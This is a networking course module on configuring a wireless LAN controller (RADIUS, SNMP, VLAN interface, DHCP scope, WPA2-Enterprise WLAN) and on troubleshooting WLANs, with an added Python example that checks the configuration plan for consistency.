5. Verify the WLAN is Operational

Click WLANs in the menu on the left to view the newly configured WLAN. In the figure, you can verify that
WLAN ID 1 is configured with Wireless_LAN as the name and SSID, it is enabled, and is using WPA2 PSK
security.

6. Monitor the WLAN

Click the Monitor tab at the top to access the advanced Summary page again. Here you can see that
the Wireless_LAN now has one client using its services, as shown in the figure.

7. View Wireless Client Information

Click Clients in the left menu to view more information about the clients connected to the WLAN, as shown in
the figure. One client is attached to Wireless_LAN through AP1 and was given the IP address [Link].
DHCP services in this topology are provided by the router.

13.2.7 Packet Tracer – Configure a Basic WLAN on the WLC

In this lab, you will explore some of the features of a wireless LAN controller. You will create a new WLAN on
the controller and implement security on that LAN. Then you will configure a wireless host to connect to the
new WLAN through an AP that is under the control of the WLC. Finally, you will verify connectivity.

13.3 Configure a WPA2 Enterprise WLAN on the WLC

13.3.1 Video – Define a SNMP and RADIUS Server on the WLC

The previous topic covered configuring a basic WLAN on the WLC. Now you will learn about configuring a
WPA2 Enterprise WLAN.

Click Play in the figure to view a demonstration of configuring SNMP and RADIUS services on the WLC.

13.3.2 SNMP and RADIUS

In the figure, PC-A is running Simple Network Management Protocol (SNMP) and Remote Authentication
Dial-In User Service (RADIUS) server software. SNMP is used to monitor the network. The network administrator
wants the WLC to forward all SNMP log messages, called traps, to the SNMP server.

In addition, for WLAN user authentication, the network administrator wants to use a RADIUS server for
authentication, authorization, and accounting (AAA) services. Instead of entering a publicly known pre-shared
key to authenticate, as they do with WPA2-PSK, users will enter their own username and password
credentials. The credentials will be verified by the RADIUS server. This way, individual user access can be
tracked and audited if necessary and user accounts can be added or modified from a central location. The
RADIUS server is required for WLANs that are using WPA2 Enterprise authentication.

Note: SNMP server and RADIUS server configuration is beyond the scope of this module.

Topology

13.3.3 Configure SNMP Server Information

Click the MANAGEMENT tab to access a variety of management features. SNMP is listed at the top of the
menu on the left. Click SNMP to expand the sub-menus, and then click Trap Receivers. Click New... to
configure a new SNMP trap receiver, as shown in the figure.

Enter the SNMP Community name and the IP address (IPv4 or IPv6) for the SNMP server. Click Apply. The
WLC will now forward SNMP log messages to the SNMP server.

13.3.4 Configure RADIUS Server Information

In our example configuration, the network administrator wants to configure a WLAN using WPA2 Enterprise,
as opposed to WPA2 Personal or WPA2 PSK. Authentication will be handled by the RADIUS server running
on PC-A.

To configure the WLC with the RADIUS server information, click the SECURITY tab
> RADIUS > Authentication. No RADIUS servers are currently configured. Click New... to add PC-A as the
RADIUS server.

1. Click SECURITY
2. Click RADIUS
3. Click Authentication
4. Click New...

Enter the IPv4 address for PC-A and the shared secret. This is the password used between the WLC and the
RADIUS server. It is not for users. Click Apply, as shown in the figure.

After clicking Apply, the list of configured RADIUS Authentication Servers refreshes with the new server
listed, as shown in the figure.

13.3.5 Video – Configure a VLAN for a New WLAN

Click Play in the figure to view a demonstration of configuring a VLAN on the WLC.

13.3.6 Topology with VLAN 5 Addressing

Each WLAN configured on the WLC needs its own virtual interface. The WLC has five physical ports for data
traffic. Each physical port can be configured to support multiple WLANs, each on its own virtual interface.
Physical ports can also be aggregated to create high-bandwidth links.

The network administrator has decided that the new WLAN will use interface VLAN 5 and network
[Link]/24. R1 already has a subinterface configured and active for VLAN 5, as shown in the topology
and show ip interface brief output.

Topology

R1# show ip interface brief
Interface IP-Address OK? Method Status Protocol
FastEthernet0/0 [Link] YES manual up up
FastEthernet0/1 unassigned YES unset up up
FastEthernet0/1.1 [Link] YES manual up up
FastEthernet0/1.5 [Link] YES manual up up
(output omitted)
R1#

13.3.7 Configure a New interface

VLAN interface configuration on the WLC includes the following steps:

1. Create a new interface.
2. Configure the VLAN name and ID.
3. Configure the port and interface address.
4. Configure the DHCP server address.
5. Apply and Confirm.
6. Verify Interfaces.

1. Create a new interface.

To add a new interface, click CONTROLLER > Interfaces > New..., as shown in the figure.

1. Click CONTROLLER
2. Click Interfaces
3. Click New...

2. Configure the VLAN name and ID.

In the figure, the network administrator configures the interface name as vlan5 and the VLAN ID as 5.
Clicking Apply will create the new interface.

3. Configure the port and interface address.

On the Edit page for the interface, configure the physical port number. G1 in the topology is Port Number 1 on
the WLC. Then configure the VLAN 5 interface addressing. In the figure, VLAN 5 is assigned IPv4 address
[Link]/24. R1 is the default gateway at IPv4 address [Link].

4. Configure the DHCP server address.

In larger enterprises, WLCs will be configured to forward DHCP messages to a dedicated DHCP server. Scroll
down the page to configure the primary DHCP server as IPv4 address [Link], as shown in the figure.
This is the default gateway router address. The router is configured with a DHCP pool for the WLAN network.
As hosts join the WLAN that is associated with the VLAN 5 interface, they will receive addressing information
from this pool.

5. Apply and Confirm.

Scroll to the top and click Apply, as shown in the figure. Click OK for the warning message.

6. Verify Interfaces.

Click Interfaces. The new vlan5 interface is now shown in the list of interfaces with its IPv4 address, as
shown in the figure.

13.3.8 Video – Configure a DHCP Scope

Click Play in the figure to view a demonstration of configuring DHCP services.

13.3.9 Configure a DHCP Scope

DHCP scope configuration includes the following steps:

1. Create a new DHCP scope.
2. Name the DHCP scope.
3. Verify the new DHCP scope.
4. Configure and enable the new DHCP scope.
5. Verify the enabled DHCP scope.

1. Create a new DHCP scope.

A DHCP scope is very similar to a DHCP pool on a router. It can include a variety of information including a
pool of addresses to assign to DHCP clients, DNS server information, lease times, and more. To configure a
new DHCP scope, click Internal DHCP Server > DHCP Scope > New..., as shown in the figure.

1. Click Internal DHCP Server.
2. Click DHCP Scope.
3. Click New...

2. Name the DHCP scope.

On the next screen, name the scope. Because this scope will apply to the wireless management network, the
network administrator uses Wireless_Management as the Scope Name and clicks Apply.

3. Verify the new DHCP scope.

You are returned to the DHCP Scopes page and can verify the scope is ready to be configured. Click the new
Scope Name to configure the DHCP scope.

4. Configure and enable the new DHCP scope.

On the Edit screen for the Wireless_Management scope, configure a pool of addresses for the
[Link]/24 network starting at .240 and ending at .249. The network address and subnet mask are
configured. The default router IPv4 address is configured, which is the subinterface for R1 at [Link].
For this example, the rest of the scope is left unchanged. The network administrator selects Enabled from the
Status drop down and clicks Apply.

5. Verify the enabled DHCP scope.

The network administrator is returned to the DHCP Scopes page and can verify the scope is ready to be
allocated to a new WLAN.

13.3.10 Video – Configure a WPA2 Enterprise WLAN

Click Play in the figure to view a demonstration of configuring a new WLAN with WPA2 Enterprise on the
WLC.

13.3.11 Configure a WPA2 Enterprise WLAN

By default, all newly created WLANs on the WLC will use WPA2 with Advanced Encryption Standard (AES).
802.1X is the default key management protocol used to communicate with the RADIUS server. Because the
network administrator already configured the WLC with the IPv4 address of the RADIUS server running on
PC-A, the only configuration left to do is to create a new WLAN to use interface vlan5.

Configuring a new WLAN on the WLC includes the following steps:

1. Create a new WLAN.
2. Configure the WLAN name and SSID.
3. Enable the WLAN for VLAN 5.
4. Verify AES and 802.1X defaults.
5. Configure WLAN security to use the RADIUS server.
6. Verify the new WLAN is available.

1. Create a new WLAN.

Click the WLANs tab and then Go to create a new WLAN, as shown in the figure.

2. Configure the WLAN name and SSID.

Fill in the profile name and SSID. In order to be consistent with the VLAN that was previously configured,
choose an ID of 5. However, any available value can be used. Click Apply to create the new WLAN, as shown
in the figure.

3. Enable the WLAN for VLAN 5.

The WLAN is created but it still needs to be enabled and associated with the correct VLAN interface. Change
the status to Enabled and choose vlan5 from the Interface/Interface Group(G) dropdown list. Click Apply and
click OK to accept the popup message, as shown in the figure.

1. Click Enabled
2. Choose vlan5
3. Click Apply
4. Click OK

4. Verify AES and 802.1X defaults.

Click the Security tab to view the default security configuration for the new WLAN. The WLAN will use WPA2
security with AES encryption. Authentication traffic is handled by 802.1X between the WLC and the RADIUS
server.

The figure depicts verifying AES and 802.1X defaults on a WLC GUI. The WLANs tab on the main menu is
selected. Under WLANs > Edit the Security sub-menu is selected and outlined with a rectangle and the
number 1. Under WPA2 Encryption, AES is selected and outlined with a rectangle and the number 2. Under
Authentication Key Management, 802.1X is enabled and outlined with a rectangle and the number 3.

5. Configure the RADIUS server.

We now need to select the RADIUS server that will be used to authenticate users for this WLAN. Click
the AAA Servers tab. In the dropdown box select the RADIUS server that was configured on the WLC
previously. Apply your changes.

6. Verify that the new WLAN is available.

To verify the new WLAN is listed and enabled, click Back or the WLANs submenu on the left. Both
the Wireless_LAN WLAN and the CompanyName WLAN are listed. In the figure, notice that both are
enabled. Wireless_LAN is using WPA2 with PSK authentication. CompanyName is using WPA2 security
with 802.1X authentication.
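As an added example (not Cisco's code and not the WLC's own interface), the Python below models the objects created in 13.2.6 and 13.3.4 through 13.3.11 and checks them against each other before anything is applied: the interface and DHCP scope addressing must agree, a WPA2-PSK WLAN needs a usable pre-shared key, and a WPA2-Enterprise WLAN must point at a RADIUS server that actually exists on the WLC. The class and function names and all IPv4 addresses are constructed assumptions; the page's own addresses are not reproduced here.

```python
# Added example (not Cisco WLC code): a consistency check for the WLC plan built in
# 13.2.6 and 13.3.4-13.3.11. All IPv4 values are constructed documentation addresses.
from dataclasses import dataclass
from ipaddress import IPv4Address, IPv4Network
from typing import List, Optional

@dataclass
class RadiusServer:              # SECURITY > RADIUS > Authentication > New...
    address: IPv4Address
    shared_secret: str           # used between WLC and RADIUS, not by users

@dataclass
class VlanInterface:             # CONTROLLER > Interfaces > New...
    name: str
    vlan_id: int
    port: int                    # physical WLC port carrying this VLAN
    network: IPv4Network
    address: IPv4Address
    gateway: IPv4Address         # R1 subinterface for this VLAN
    dhcp_server: IPv4Address     # where the WLC forwards DHCP messages

@dataclass
class DhcpScope:                 # Internal DHCP Server > DHCP Scope
    name: str
    network: IPv4Network
    first: IPv4Address
    last: IPv4Address
    default_router: IPv4Address
    enabled: bool

@dataclass
class Wlan:                      # WLANs > New... plus the Security tab
    wlan_id: int
    ssid: str
    enabled: bool
    interface: str               # Interface/Interface Group(G) selection
    layer2: str                  # "WPA2-PSK" or "WPA2-Enterprise"
    psk: str = ""
    radius: Optional[RadiusServer] = None   # AAA Servers tab selection

def check_plan(ifaces, scopes, wlans, radius_servers) -> List[str]:
    """Return the problems found; an empty list means the plan is consistent."""
    problems = []
    iface_names = {i.name for i in ifaces}
    for i in ifaces:
        if i.address not in i.network or i.gateway not in i.network:
            problems.append(f"{i.name}: address or gateway not in {i.network}")
    for s in scopes:
        if s.first not in s.network or s.last not in s.network or s.first > s.last:
            problems.append(f"scope {s.name}: pool {s.first}-{s.last} not inside {s.network}")
        if s.default_router not in s.network:
            problems.append(f"scope {s.name}: default router not in {s.network}")
        if not s.enabled:
            problems.append(f"scope {s.name}: Status is not Enabled")
    for w in wlans:
        if w.interface not in iface_names:
            problems.append(f"WLAN {w.ssid}: interface {w.interface} does not exist")
        if w.layer2 == "WPA2-PSK":
            # WPA2 passphrases are 8 to 63 ASCII characters (IEEE 802.11 rule)
            if not 8 <= len(w.psk) <= 63:
                problems.append(f"WLAN {w.ssid}: pre-shared key must be 8-63 characters")
        elif w.layer2 == "WPA2-Enterprise":
            # 802.1X key management needs a RADIUS server defined on the WLC
            if w.radius is None or w.radius not in radius_servers:
                problems.append(f"WLAN {w.ssid}: 802.1X selected but no configured RADIUS server")
        if not w.enabled:
            problems.append(f"WLAN {w.ssid}: created but not enabled")
    return problems

def example_plan() -> List[str]:
    """The page's two WLANs with constructed addresses; returns the check results."""
    pc_a = RadiusServer(IPv4Address("198.51.100.10"), "wlc-radius-secret")
    mgmt = VlanInterface("management", 1, 1, IPv4Network("198.51.100.0/24"),
                         IPv4Address("198.51.100.20"), IPv4Address("198.51.100.1"),
                         IPv4Address("198.51.100.1"))
    vlan5 = VlanInterface("vlan5", 5, 1, IPv4Network("192.0.2.0/24"),
                          IPv4Address("192.0.2.254"), IPv4Address("192.0.2.1"),
                          IPv4Address("192.0.2.1"))
    scope = DhcpScope("Wireless_Management", IPv4Network("192.0.2.0/24"),
                      IPv4Address("192.0.2.240"), IPv4Address("192.0.2.249"),
                      IPv4Address("192.0.2.1"), enabled=True)
    wlans = [Wlan(1, "Wireless_LAN", True, "management", "WPA2-PSK", psk="Cisco123!"),
             Wlan(5, "CompanyName", True, "vlan5", "WPA2-Enterprise", radius=pc_a)]
    return check_plan([mgmt, vlan5], [scope], wlans, [pc_a])
```

Running `example_plan()` on a consistent plan returns an empty list; omitting the RADIUS server from the CompanyName WLAN, or pointing a WLAN at an interface that was never created, shows up as a problem before the Apply step.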

13.3.12 Packet Tracer – Configure a WPA2 Enterprise WLAN on the WLC

In this activity, you will configure a new WLAN on a wireless LAN controller (WLC), including the VLAN
interface that it will use. You will configure the WLAN to use a RADIUS server and WPA2-Enterprise to
authenticate users. You will also configure the WLC to use an SNMP server.

13.4 Troubleshoot WLAN Issues

13.4.1 Troubleshooting Approaches

In the previous topics, you learned about WLAN configuration. Here we will discuss troubleshooting WLAN
issues.

Network problems can be simple or complex, and can result from a combination of hardware, software, and
connectivity issues. Technicians must be able to analyze the problem and determine the cause of the error
before they can resolve the network issue. This process is called troubleshooting.

Troubleshooting any sort of network problem should follow a systematic approach. A common and efficient
troubleshooting methodology is based on the scientific method and can be broken into the six main steps
shown in the table.

Step 1 - Identify the Problem: The first step in the troubleshooting process is to identify the problem.
While tools can be used in this step, a conversation with the user is often very helpful.

Step 2 - Establish a Theory of Probable Causes: After you have talked to the user and identified the
problem, you can try and establish a theory of probable causes. This step often yields more than a few
probable causes to the problem.

Step 3 - Test the Theory to Determine Cause: Based on the probable causes, test your theories to
determine which one is the cause of the problem. A technician will often apply a quick procedure to test
and see if it solves the problem. If a quick procedure does not correct the problem, you might need to
research the problem further to establish the exact cause.

Step 4 - Establish a Plan of Action to Resolve the Problem and Implement the Solution: After you have
determined the exact cause of the problem, establish a plan of action to resolve the problem and
implement the solution.

Step 5 - Verify Full System Functionality and Implement Preventive Measures: After you have corrected the
problem, verify full functionality and, if applicable, implement preventive measures.

Step 6 - Document Findings, Actions, and Outcomes: In the final step of the troubleshooting process,
document your findings, actions, and outcomes. This is very important for future reference.

To assess the problem, determine how many devices on the network are experiencing the problem. If there is
a problem with one device on the network, start the troubleshooting process at that device. If there is a
problem with all devices on the network, start the troubleshooting process at the device where all other
devices are connected. You should develop a logical and consistent method for diagnosing network problems
by eliminating one problem at a time.

13.4.2 Wireless Client Not Connecting

When troubleshooting a WLAN, a process of elimination is recommended.

In the figure, a wireless client is not connecting to the WLAN.

The figure shows a network topology with a wireless client not able to connect to the AP. The figure has a
router connected to a switch. The switch is connected to a second switch. The second switch is connected to
a WLC, 2 PCs and the AP. The AP is wirelessly connected to a Cell phone, Tablet and Laptop. However the
Laptop connection to the AP has an X indicating no connection has been formed.

If there is no connectivity, check the following:

• Confirm the network configuration on the PC using the ipconfig command. Verify that the PC has
received an IP address via DHCP or is configured with a static IP address.
• Confirm that the device can connect to the wired network. Connect the device to the wired LAN and ping a
known IP address.
• If necessary, reload drivers as appropriate for the client. It may be necessary to try a different wireless
NIC.
• If the wireless NIC of the client is working, check the security mode and encryption settings on the client. If
the security settings do not match, the client cannot gain access to the WLAN.

If the PC is operational but the wireless connection is performing poorly, check the following:

• How far is the PC from an AP? Is the PC out of the planned coverage area (BSA)?
• Check the channel settings on the wireless client. The client software should detect the appropriate
channel as long as the SSID is correct.
• Check for the presence of other devices in the area that may be interfering with the 2.4 GHz band.
Examples of other devices are cordless phones, baby monitors, microwave ovens, wireless security
systems, and potentially rogue APs. Data from these devices can cause interference in the WLAN and
intermittent connection problems between a wireless client and AP.

Next, ensure that all the devices are actually in place. Consider a possible physical security issue. Is there
power to all devices and are they powered on?

Finally, inspect links between cabled devices looking for bad connectors or damaged or missing cables. If the
physical plant is in place, verify the wired LAN by pinging devices, including the AP. If connectivity still fails at
this point, perhaps something is wrong with the AP or its configuration.

When the user PC is eliminated as the source of the problem, and the physical status of devices is confirmed,
begin investigating the performance of the AP. Check the power status of the AP.

13.4.3 Troubleshooting When the Network is Slow

To optimize and increase the bandwidth of 802.11 dual-band routers and APs, either:

• Upgrade your wireless clients - Older 802.11b, 802.11g, and even 802.11n devices can slow the entire
WLAN. For the best performance, all wireless devices should support the same highest acceptable
standard. Although 802.11ax was released in 2019, 802.11ac is most likely the highest standard that
enterprises can currently enforce.
• Split the traffic - The easiest way to improve wireless performance is to split the wireless traffic between
the 802.11n 2.4 GHz band and the 5 GHz band. Therefore, 802.11n (or better) can use the two bands as
two separate wireless networks to help manage the traffic. For example, use the 2.4 GHz network for
basic internet tasks, such as web browsing, email, and downloads, and use the 5 GHz band for streaming
multimedia, as shown in the figure.

The figure depicts a home network splitting the traffic between 2.4GHz and 5GHz. The WLC is connected to a
television, cell phone and tablet using 5GHz. It is also connected to two laptops using 2.4 GHz.

There are several reasons for using a split-the-traffic approach:

• The 2.4 GHz band may be suitable for basic Internet traffic that is not time-sensitive.
• The bandwidth may still be shared with other nearby WLANs.
• The 5 GHz band is much less crowded than the 2.4 GHz band; ideal for streaming multimedia.
• The 5 GHz band has more channels; therefore, the channel chosen is likely interference-free.

By default, dual-band routers and APs use the same network name on both the 2.4 GHz band and the 5 GHz
band. The simplest way to segment traffic is to rename one of the wireless networks. With a separate,
descriptive name, it is easier to connect to the right network.

To improve the range of a wireless network, ensure the wireless router or AP location is free of obstructions,
such as furniture, fixtures, and tall appliances. These block the signal, which shortens the range of the WLAN.

If this still does not solve the problem, then a Wi-Fi Range Extender or deploying the Powerline wireless
technology may be used.

13.4.4 Updating Firmware

Most wireless routers and APs offer upgradable firmware. Firmware releases may contain fixes for common
problems reported by customers as well as security vulnerabilities. You should periodically check the router or
AP for updated firmware. In the figure, the network administrator is verifying that the firmware is up to date on
a Cisco Meraki AP.

On a WLC, there will most likely be the ability to upgrade the firmware on all APs that the WLC controls. In the
next figure, the network administrator is downloading the firmware image that will be used to upgrade all the
APs.

On a Cisco 3504 Wireless Controller, click the WIRELESS tab > Access Points from the left menu > Global
Configuration submenu. Then scroll to the bottom of the page for the AP Image Pre-download section.

Users will be disconnected from the WLAN and the internet until the upgrade finishes. The wireless router may
need to reboot several times before normal network operations are restored.

13.4.5 Packet Tracer – Troubleshoot WLAN Issues

Now that you have learned how to configure wireless in home and enterprise networks, you need to learn how
to troubleshoot in both wireless environments. Your goal is to enable connectivity between hosts on the
networks to the Web Server by both IP address and URL. Connectivity between the home and enterprise
networks is not required.

13.5 Module Practice and Summary

13.5.1 Packet Tracer - WLAN Configuration

In this activity, you will configure both a wireless home router and a WLC-based network. You will implement
both WPA2-PSK and WPA2-Enterprise security.

13.5.2 What did I learn in this module?

Remote workers, small branch offices, and home networks often use a wireless router, which typically includes
a switch for wired clients, a port for an internet connection (sometimes labeled “WAN”), and wireless
components for wireless client access. Most wireless routers are preconfigured to be connected to the
network and provide services. The wireless router uses DHCP to automatically provide addressing information
to connected devices. Your first priority should be to change the username and password of your wireless
router. Use your router’s interface to complete basic network and wireless setup. If you want to extend the
range beyond approximately 45 meters indoors and 90 meters outdoors, you can add wireless access points.
The router will use a process called Network Address Translation (NAT) to convert private IPv4 addresses to
Internet-routable IPv4 addresses. By configuring QoS, you can guarantee that certain traffic types, such as
voice and video, are prioritized over traffic that is not as time-sensitive, such as email and web browsing.

Lightweight APs (LAPs) use the Lightweight Access Point Protocol (LWAPP) to communicate with a WLAN
controller (WLC). Configuring a wireless LAN controller (WLC) is similar to configuring a wireless router except
that a WLC controls APs and provides more services and management capabilities. Use the WLC interface to
view an overall picture of the AP’s system information and performance, to access advanced settings and to
configure a WLAN.

SNMP is used to monitor the network. The WLC is set to forward all SNMP log messages, called traps, to the
SNMP server. For WLAN user authentication, a RADIUS server is used for authentication, authorization, and
accounting (AAA) services. Individual user access can be tracked and audited. Use the WLC interface to
configure SNMP server and RADIUS server information, VLAN interfaces, DHCP scope, and a WPA2
Enterprise WLAN.

There are six steps to the troubleshooting process. When troubleshooting a WLAN, a process of elimination is
recommended. Common problems are: no connectivity and poorly performing wireless connection when the
PC is operational. To optimize and increase the bandwidth of 802.11 dual-band routers and APs, either:
upgrade your wireless clients or split the traffic. Most wireless routers and APs offer upgradable firmware.
Firmware releases may contain fixes for common problems reported by customers as well as security
vulnerabilities. You should periodically check the router or AP for updated firmware.

13.5.3 Module Quiz – WLAN Configuration

Glossary

AP – Access Point

BYODs – Bring Your Own Devices

DDoS – Distributed Denial of Service

VPN – Virtual Private Network

NGFW – Next-Generation Firewall

NAC – Network Access Control

WLCs – Wireless LAN Controllers
